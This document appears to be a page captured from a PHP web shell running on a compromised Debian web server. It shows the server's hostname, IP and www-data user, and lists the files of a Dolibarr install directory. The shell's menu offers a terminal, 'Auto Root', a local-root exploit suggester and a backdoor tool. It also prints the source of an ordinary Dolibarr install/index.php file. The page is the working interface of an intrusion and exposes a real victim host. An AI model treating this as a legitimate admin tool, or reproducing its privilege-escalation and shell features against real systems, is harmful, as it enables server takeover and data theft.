Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
btm2000.apps-dev.fr /
install /
Delete
Unzip
Name
Size
Permission
Date
Action
doctemplates
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
lib
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
medias
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
mssql
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
mysql
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
pgsql
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
sqlite3
[ DIR ]
drwxr-xr-x
2023-12-15 13:44
check.php
24.98
KB
-rw-r--r--
2023-12-15 13:44
default.css
9.76
KB
-rw-r--r--
2023-12-15 13:44
fileconf.php
23.4
KB
-rw-r--r--
2023-12-15 13:44
inc.php
27.3
KB
-rw-r--r--
2023-12-15 13:44
index.php
2.34
KB
-rw-r--r--
2023-12-15 13:44
install.forced.sample.php
2.86
KB
-rw-r--r--
2023-12-15 13:44
phpinfo.php
887
B
-rw-r--r--
2023-12-15 13:44
repair.php
57.53
KB
-rw-r--r--
2023-12-15 13:44
robots.txt
25
B
-rw-r--r--
2023-12-15 13:44
step1.php
38.7
KB
-rw-r--r--
2023-12-15 13:44
step2.php
21.17
KB
-rw-r--r--
2023-12-15 13:44
step4.php
4.22
KB
-rw-r--r--
2023-12-15 13:44
step5.php
23.33
KB
-rw-r--r--
2023-12-15 13:44
upgrade.php
17.15
KB
-rw-r--r--
2023-12-15 13:44
upgrade2.php
149.67
KB
-rw-r--r--
2023-12-15 13:44
Save
Rename
<?php /* Copyright (C) 2004-2005 Rodolphe Quiedeville <rodolphe@quiedeville.org> * Copyright (C) 2004-2010 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2016 Raphaƫl Doursenaud <rdoursenaud@gpcsolutions.fr> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/install/index.php * \ingroup install * \brief Show page to select language. This is done only for a first installation. * For a reinstall this page redirect to page check.php */ define('ALLOWED_IF_UPGRADE_UNLOCK_FOUND', 1); include_once 'inc.php'; include_once '../core/class/html.form.class.php'; include_once '../core/class/html.formadmin.class.php'; global $langs; $err = 0; // If the config file exists and is filled, we're not on first install so we skip the language selection page if (file_exists($conffile) && isset($dolibarr_main_url_root)) { header("Location: check.php?testget=ok"); exit; } $langs->load("admin"); /* * View */ $formadmin = new FormAdmin(null); // Note: $db does not exist yet but we don't need it, so we put ''. pHeader("", "check"); // Next step = check if (!is_readable($conffile)) { print '<br>'; print '<span class="opacitymedium">'.$langs->trans("NoReadableConfFileSoStartInstall").'</span>'; } // Ask installation language print '<br><br><div class="center">'; print '<table>'; print '<tr>'; print '<td>'.$langs->trans("DefaultLanguage").' : </td><td>'; print $formadmin->select_language('auto', 'selectlang', 1, 0, 0, 1); print '</td>'; print '</tr>'; print '</table></div>'; //print '<br><br><span class="opacitymedium">'.$langs->trans("SomeTranslationAreUncomplete").'</span>'; // If there's no error, we display the next step button if ($err == 0) { pFooter(0); }